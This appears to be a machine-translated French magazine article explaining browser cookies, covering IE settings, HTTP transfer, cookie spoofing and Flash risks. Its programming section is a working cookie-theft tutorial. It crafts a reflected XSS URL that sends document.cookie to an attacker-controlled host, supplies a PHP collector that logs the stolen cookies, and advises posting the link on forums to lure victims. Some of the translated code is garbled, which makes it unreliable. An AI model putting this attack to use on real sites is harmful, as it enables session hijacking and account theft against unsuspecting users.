Cookie signifie petit dessert en anglais, et nous pouvons toujours voir ce mot dans le navigateur. Comment la nourriture peut-elle être liée au navigateur ? Lorsque vous naviguez sur un site Web auquel vous êtes déjà connecté, vous pouvez voir le message suivant sur la page Web : Bonjour XX, c'est très convivial, comme manger un petit dessert. Ceci est en fait réalisé en accédant à un fichier dans votre hôte, ce fichier est donc également appelé cookie. Vous voulez tout savoir sur les cookies ? Jetez un oeil ci-dessous!
1. Comprendre les cookies Objets applicables : lecteurs débutants
Le cookie est un petit fichier texte que le site Web stocke sur votre ordinateur lorsque vous naviguez sur un site Web. Il enregistre votre identifiant d'utilisateur, votre mot de passe, les pages Web consultées, le temps passé et d'autres informations lorsque vous visitez. À nouveau sur le site Web, le site Web apprend vos informations pertinentes en lisant le cookie et peut prendre les actions correspondantes, telles que l'affichage d'un slogan vous souhaitant la bienvenue sur la page, ou vous permettant de naviguer directement sans saisir votre identifiant ou votre mot de passe, etc. . Vous pouvez visualiser tous les cookies enregistrés sur votre ordinateur en sélectionnant « Paramètres/Afficher les fichiers » dans l'onglet « Général » de « Outils/Options Internet » dans IE. Ces fichiers sont généralement nommés au format user@domain , où user est votre nom d'utilisateur local et domain est le nom de domaine du site Web que vous visitez. Si vous utilisez le navigateur NetsCape, il est stocké dans « C:PROGRAMFILESNETSCAPEUSERS ». Contrairement à IE, NETSCAPE utilise un fichier Cookie pour enregistrer les cookies de tous les sites Web.
Afin de garantir la sécurité Internet, nous devons définir les cookies de manière appropriée. Ouvrez l'onglet « Confidentialité » dans « Outils/Options Internet » (notez que ce paramètre n'existe que dans IE6.0, les autres versions d'IE peuvent cliquer sur « Niveau personnalisé » dans l'onglet « Sécurité » du bouton « Outils/Options Internet » pour effectuer des réglages simples) pour ajuster le niveau de sécurité des cookies. Normalement, vous pouvez régler le curseur sur la position « moyenne-haute » ou « haute ». La plupart des sites de forum nécessitent l'utilisation d'informations sur les cookies. Si vous ne vous rendez jamais sur ces sites, vous pouvez régler le niveau de sécurité sur « Bloquer tous les cookies ». Si vous souhaitez simplement bloquer les cookies de sites Web individuels, vous pouvez cliquer sur le bouton « Modifier » pour ajouter les sites Web que vous souhaitez bloquer à la liste. Dans l'option du bouton "Avancé", vous pouvez définir des cookies propriétaires et des cookies tiers. Les cookies propriétaires sont des cookies du site Web que vous visitez, et les cookies tiers ne sont pas des cookies qui vous sont envoyés par le site Web que vous visitez. navigation. Habituellement, vous devez choisir « Rejeter » pour les cookies tiers, comme le montre la figure 1. Si vous devez enregistrer des cookies, vous pouvez utiliser la fonction « Importer et exporter » d'IE, ouvrir « Fichier/Importer et exporter » et suivre les instructions.
La plupart du contenu du cookie est crypté, il nous semble donc qu'il s'agit simplement d'une combinaison dénuée de sens de lettres et de chiffres. Seul le gestionnaire CGI du serveur connaît leur véritable signification. Nous pouvons afficher plus de contenu via certains logiciels. Les informations sur les cookies consultées à l'aide du logiciel Cookie Pal sont présentées dans la figure 2. Il nous fournit le contenu du serveur, Expire, Nom, Valeur et d'autres options. Parmi eux, Server est le site Web qui stocke les cookies, Expires enregistre l'heure et la durée de vie du cookie, et les champs Nom et valeur sont des données spécifiques (ce journal présente une introduction détaillée à ce logiciel dans le numéro 10, page 42).
Adresse de téléchargement : http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. Processus de livraison des cookies Objets applicables : Lecteurs intermédiaires Lorsqu'ils tapent l'URL d'un site Web dans la barre d'adresse du navigateur, le navigateur enverra une demande de lecture de la page Web au site Web et affichera le résultat sur le moniteur. À ce stade, la page Web recherche le fichier Cookie défini par le site Web d'Amazon sur votre ordinateur. S'il est trouvé, le navigateur enverra les données du fichier Cookie ainsi que l'URL saisie précédemment au serveur Amazon. Lorsque le serveur reçoit les données des cookies, il récupérera votre identifiant, vos enregistrements d'achats, vos préférences personnelles et d'autres informations dans sa base de données, enregistrera le nouveau contenu et l'ajoutera à la base de données et aux fichiers cookies. Si aucun cookie n'est détecté ou si les informations de votre cookie ne correspondent pas aux informations de la base de données, cela signifie que vous naviguez sur le site Web pour la première fois et le programme CGI du serveur créera de nouvelles informations d'identification pour vous et les enregistrera dans la base de données.
Les cookies sont transférés à l'aide des informations d'en-tête HTTP dans le code de la page Web. Les cookies peuvent être transférés à chaque demande de page Web effectuée par le navigateur, par exemple lorsque le navigateur ouvre ou actualise la page Web. Le serveur ajoute le cookie aux informations d'en-tête HTTP de la page Web et transmet les données de la page Web à votre navigateur. Le navigateur choisira d'enregistrer ou non ces données en fonction des paramètres des cookies de votre ordinateur. Si le navigateur n'autorise pas l'enregistrement des cookies, les données disparaîtront après la fermeture du navigateur. La durée de stockage des cookies sur votre ordinateur est différente et dépend des paramètres du serveur. Les cookies ont un attribut Expire (période de validité), qui détermine la durée de stockage du cookie. Le serveur peut modifier la durée de stockage du cookie en définissant la valeur du champ Expire. Si cet attribut n'est pas défini, les cookies ne sont valables que lors de la navigation sur le Web. Si vous fermez le navigateur, ces cookies disparaîtront automatiquement. C'est le cas pour la plupart des sites Web. Normalement, un cookie contient les champs Serveur, Expire, Nom et Valeur. Seuls les champs Nom et Valeur sont utiles au serveur. Le contenu des champs Expire et autres sert simplement à indiquer au navigateur comment traiter ces cookies.
3. Implémentation de la programmation des cookies Objets applicables : lecteurs avancés La plupart des langages de programmation Web prennent en charge les cookies. Tels que JavaScript, VBScript, Delphi, ASP, SQL, PHP, C#, etc. Dans ces langages de programmation orientés objet, l'utilisation de la programmation du Cookie est fondamentalement similaire. Le processus général est le suivant : créez d'abord un objet Cookie (Objet), puis utilisez la fonction de contrôle pour attribuer, lire, écrire et d'autres opérations au Cookie. Alors, comment obtenir des informations sensibles dans les cookies d’autres utilisateurs via du code ? Une brève introduction suit.
Cette méthode comporte deux étapes principales. Premièrement, localiser le site Web dont vous avez besoin pour collecter les cookies, l'analyser et construire l'URL ; puis compiler le code PHP pour collecter les cookies et le placer sur un site Web que vous pouvez contrôler, sans le savoir. le code peut être exécuté après que l'utilisateur a cliqué sur l'URL que vous avez construite. Examinons le processus de mise en œuvre spécifique ci-dessous.
1. Analysez et construisez l'URL.
Ouvrez d'abord le site Web sur lequel nous souhaitons collecter les cookies. Ici, nous supposons qu'il s'agit de http://www.XXX.net . Connectez-vous au site Web et entrez le nom d'utilisateur "<A1>" (. sans guillemets) pour analyser les données et capturer les paquets, obtenez un code sous la forme de "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x. =28&ok.y=6", remplacez "<A1>" Réessayez pour "<script>alert(document.cookie)</script>" ; si l'exécution réussit, commencez à construire l'URL : "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". Parmi eux, http:///www.cbifamily.org/cbi.php est un script sur un certain hôte que vous pouvez contrôler. Il est à noter que "%2B" est l'encodage URL du symbole "+", car "+" sera traité comme un espace. L'URL peut être publiée sur le forum pour inciter les autres à cliquer dessus.
2. Préparez le script PHP
La fonction de ce script est de collecter les fichiers Cookie. Le contenu spécifique est le suivant :
<?php
$info = getenv("QUERY_STRING");
si ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
header("Emplacement : http://www.downcodes.com ");
?>
4. Problèmes de sécurité des cookies Objets applicables : Tous les lecteurs qui souhaitent être en sécurité en ligne
1. Tromperie des cookies
Les cookies enregistrent des informations telles que les identifiants de compte utilisateur et les mots de passe S'ils sont transmis en ligne, le cryptage MD5 est généralement utilisé. Même si les informations cryptées sont interceptées par certaines personnes ayant des arrière-pensées sur Internet, elles ne pourront pas les comprendre car elles ne voient que des lettres et des chiffres dénués de sens. Cependant, le problème est que les personnes qui interceptent les cookies n'ont pas besoin de connaître la signification de ces chaînes. Il leur suffit de soumettre les cookies d'autres personnes au serveur et, si elles réussissent la vérification, elles peuvent prétendre être l'identité de la victime. connectez-vous au site Web. Cette méthode est appelée usurpation de cookies. La condition préalable à l'usurpation d'identité des cookies est qu'il existe une vulnérabilité dans le programme de vérification du serveur et que l'imposteur souhaite obtenir les informations sur les cookies de la personne usurpée. Il est très difficile pour le programme actuel de vérification du site Web d'exclure toutes les connexions illégales. Par exemple, le langage utilisé pour écrire le programme de vérification peut comporter des failles. De plus, il est très simple d'obtenir les cookies d'autres personnes. Vous pouvez y parvenir en écrivant un petit morceau de code dans un langage prenant en charge les cookies (voir détails dans la méthode 3). Tant que ce code est placé sur le réseau, les cookies de tout le monde sont stockés. peuvent être collectés. Si un forum autorise le code HTML ou autorise l'utilisation de balises Flash, vous pouvez utiliser ces technologies pour collecter le code des cookies et le mettre dans le forum, puis donner au message un sujet attrayant et rédiger un contenu intéressant, et vous pouvez rapidement en collecter un grand nombre. de Cookies. Sur le forum, les mots de passe de nombreuses personnes ont été volés par cette méthode. Quant à la manière de l'empêcher, il n'existe actuellement aucun remède spécifique. Nous pouvons uniquement utiliser les méthodes de protection habituelles. N'utilisez pas de mots de passe importants dans les forums, n'utilisez pas la fonction IE pour enregistrer automatiquement les mots de passe et essayez de ne pas vous connecter aux sites Web. dont vous ne connaissez pas les détails.
2. Dangers cachés du code Flash
Il existe une fonction getURL() dans Flash qui peut utiliser cette fonction pour ouvrir automatiquement une page Web spécifiée. Par conséquent, cela peut vous diriger vers un site Web contenant du code malveillant. Par exemple, lorsque vous profitez d'une belle animation Flash sur votre ordinateur, le code dans l'image d'animation peut avoir été discrètement connecté à Internet et avoir ouvert une très petite page contenant un code spécial. Cette page peut collecter vos cookies et faire d'autres choses, comme implanter des chevaux de Troie sur votre machine ou même formater votre disque dur, etc. Les sites Web ne peuvent pas interdire ce comportement de Flash car il s'agit du comportement interne des fichiers Flash. Ce que nous pouvons faire, c'est essayer d'ouvrir le pare-feu si vous naviguez localement. Si le pare-feu vous demande de ne pas connaître les paquets de données envoyés, il est préférable de les interdire. Si vous souhaitez en profiter sur Internet, il est préférable de trouver de grands sites Web bien connus.